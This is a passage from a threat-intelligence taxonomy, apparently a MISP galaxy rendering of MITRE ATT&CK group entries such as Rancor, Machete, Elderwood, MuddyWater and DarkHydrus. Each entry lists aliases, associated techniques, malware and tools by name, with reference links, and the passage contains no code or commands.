uses: misp-galaxy:mitre-malware="BLACKCOFFEE - S0069" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SSH - T1021.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Windows Credential Editor - S0005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="at - S0110" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Cobalt Strike - S0154" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Social Media Accounts - T1585.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials - T1589.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Email Accounts - T1585.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Email Accounts - T1586.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Internal Spearphishing - T1534" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Social Media Accounts - T1586.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Data Staging - T1074.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Empire - S0363" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Tor - S0183" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="gh0st RAT - S0032" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PowerSploit - S0194" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="BADFLICK - S0642" with estimative-language:likelihood-probability="almost-certain"

Table 4559. Table References
Links
https://attack.mitre.org/groups/G0065
https://us-cert.cisa.gov/ncas/alerts/aa21-200a
https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets
https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html
https://www.accenture.com/us-en/blogs/cyber-defense/mudcarps-focus-on-submarine-technologies
https://www.crowdstrike.com/blog/two-birds-one-stone-panda/
https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/
https://www.secureworks.com/research/threat-profiles/bronze-mohawk
https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html

Rancor - G0075

[Rancor](https://attack.mitre.org/groups/G0075) is a threat group that has led targeted campaigns against the South East Asia region. [Rancor](https://attack.mitre.org/groups/G0075) uses politically-motivated lures to entice victims to open malicious documents. (Citation: Rancor Unit42 June 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Rancor - G0075"

Rancor - G0075 is also known as:

Rancor

View relationships graph

Rancor - G0075 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="PLAINTEE - S0254" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="certutil - S0160" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="DDKONG - S0255" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Reg - S0075" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

Table 4560. Table References
Links
https://attack.mitre.org/groups/G0075
https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/

Machete - G0095

[Machete](https://attack.mitre.org/groups/G0095) is a suspected Spanish-speaking cyber espionage group that has been active since at least 2010. It has primarily focused its operations within Latin America, with a particular emphasis on Venezuela, but also in the US, Europe, Russia, and parts of Asia. [Machete](https://attack.mitre.org/groups/G0095) generally targets high-profile organizations such as government institutions, intelligence services, and military units, as well as telecommunications and power companies.(Citation: Cylance Machete Mar 2017)(Citation: Securelist Machete Aug 2014)(Citation: ESET Machete July 2019)(Citation: 360 Machete Sep 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Machete - G0095"

Machete - G0095 is also known as:

Machete
APT-C-43
El Machete

View relationships graph

Machete - G0095 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1032" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Machete - S0409" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"

Table 4561. Table References
Links
https://attack.mitre.org/groups/G0095
https://threatvector.cylance.com/en_us/home/el-machete-malware-attacks-cut-through-latam.html
https://securelist.com/el-machete/66108/
https://www.welivesecurity.com/wp-content/uploads/2019/08/ESET_Machete.pdf
https://blog.360totalsecurity.com/en/apt-c-43-steals-venezuelan-military-secrets-to-provide-intelligence-support-for-the-reactionaries-hpreact-campaign/

Elderwood - G0066

[Elderwood](https://attack.mitre.org/groups/G0066) is a suspected Chinese cyber espionage group that was reportedly responsible for the 2009 Google intrusion known as Operation Aurora. (Citation: Security Affairs Elderwood Sept 2012) The group has targeted defense organizations, supply chain manufacturers, human rights and nongovernmental organizations (NGOs), and IT service providers. (Citation: Symantec Elderwood Sept 2012) (Citation: CSM Elderwood Sept 2012)

The tag is: misp-galaxy:mitre-intrusion-set="Elderwood - G0066"

Elderwood - G0066 is also known as:

Elderwood
Elderwood Gang
Beijing Group
Sneaky Panda

View relationships graph

Elderwood - G0066 has relationships with:

similar: misp-galaxy:threat-actor="Beijing Group" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Linfo - S0211" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Briba - S0204" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Naid - S0205" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Hydraq - S0203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Nerex - S0210" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Wiarp - S0206" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Vasport - S0207" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Pasam - S0208" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"

Table 4562. Table References
Links
https://attack.mitre.org/groups/G0066
http://securityaffairs.co/wordpress/8528/hacking/elderwood-project-who-is-behind-op-aurora-and-ongoing-attacks.html
https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf
https://www.csmonitor.com/USA/2012/0914/Stealing-US-business-secrets-Experts-ID-two-huge-cyber-gangs-in-China

Thrip - G0076

[Thrip](https://attack.mitre.org/groups/G0076) is an espionage group that has targeted satellite communications, telecoms, and defense contractor companies in the U.S. and Southeast Asia. The group uses custom malware as well as "living off the land" techniques. (Citation: Symantec Thrip June 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Thrip - G0076"

Thrip - G0076 is also known as:

Thrip

View relationships graph

Thrip - G0076 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Catchamas - S0261" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 4563. Table References
Links
https://attack.mitre.org/groups/G0076
https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets

PLATINUM - G0068

[PLATINUM](https://attack.mitre.org/groups/G0068) is an activity group that has targeted victims since at least 2009. The group has focused on targets associated with governments and related organizations in South and Southeast Asia. (Citation: Microsoft PLATINUM April 2016)

The tag is: misp-galaxy:mitre-intrusion-set="PLATINUM - G0068"

PLATINUM - G0068 is also known as:

PLATINUM

View relationships graph

PLATINUM - G0068 has relationships with:

similar: misp-galaxy:microsoft-activity-group="PLATINUM" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="PLATINUM" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Dipsind - S0200" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="JPIN - S0201" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="adbupd - S0202" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credential API Hooking - T1056.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 4564. Table References
Links
https://attack.mitre.org/groups/G0068
https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf

MuddyWater - G0069

[MuddyWater](https://attack.mitre.org/groups/G0069) is an Iranian threat group that has primarily targeted Middle Eastern nations, and has also targeted European and North American nations. The group’s victims are mainly in the telecommunications, government (IT services), and oil sectors. Activity from this group was previously linked to [FIN7](https://attack.mitre.org/groups/G0046), but the group is believed to be a distinct group possibly motivated by espionage.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)

The tag is: misp-galaxy:mitre-intrusion-set="MuddyWater - G0069"

MuddyWater - G0069 is also known as:

MuddyWater
Earth Vetala
MERCURY
Static Kitten
Seedworm
TEMP.Zagros

View relationships graph

MuddyWater - G0069 has relationships with:

similar: misp-galaxy:threat-actor="MuddyWater" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="POWERSTATS - S0223" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="CMSTP - T1218.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Proxy - T1090.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Component Object Model - T1559.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="LaZagne - S0349" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Compile After Delivery - T1027.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Multi-Stage Channels - T1104" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Office Template Macros - T1137.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Koadic - S0250" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Empire - S0363" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PowerSploit - S0194" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="SHARPSTATS - S0450" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="CrackMapExec - S0488" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Services - T1583.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Email Addresses - T1589.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="ConnectWise - S0591" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="RemoteUtilities - S0592" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Out1 - S0594" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

Table 4565. Table References
Links
https://attack.mitre.org/groups/G0069
https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/
https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group
https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf
https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/
https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html
https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies
https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html

Leafminer - G0077

[Leafminer](https://attack.mitre.org/groups/G0077) is an Iranian threat group that has targeted government organizations and business entities in the Middle East since at least early 2017. (Citation: Symantec Leafminer July 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Leafminer - G0077"

Leafminer - G0077 is also known as:

Leafminer
Raspite

View relationships graph

Leafminer - G0077 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="LaZagne - S0349" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="MailSniper - S0413" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Doppelgänging - T1055.013" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 4566. Table References
Links
https://attack.mitre.org/groups/G0077
https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east
https://www.dragos.com/blog/20180802Raspite.html

DarkHydrus - G0079

[DarkHydrus](https://attack.mitre.org/groups/G0079) is a threat group that has targeted government agencies and educational institutions in the Middle East since at least 2016. The group heavily leverages open-source tools and custom payloads for carrying out attacks. (Citation: Unit 42 DarkHydrus July 2018) (Citation: Unit 42 Playbook Dec 2017)

The tag is: misp-galaxy:mitre-intrusion-set="DarkHydrus - G0079"

DarkHydrus - G0079 is also known as:

DarkHydrus

View relationships graph

DarkHydrus - G0079 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Forced Authentication - T1187" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Template Injection - T1221" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="RogueRobin - S0270" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Cobalt Strike - S0154" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 4567. Table References
Links
https://attack.mitre.org/groups/G0079
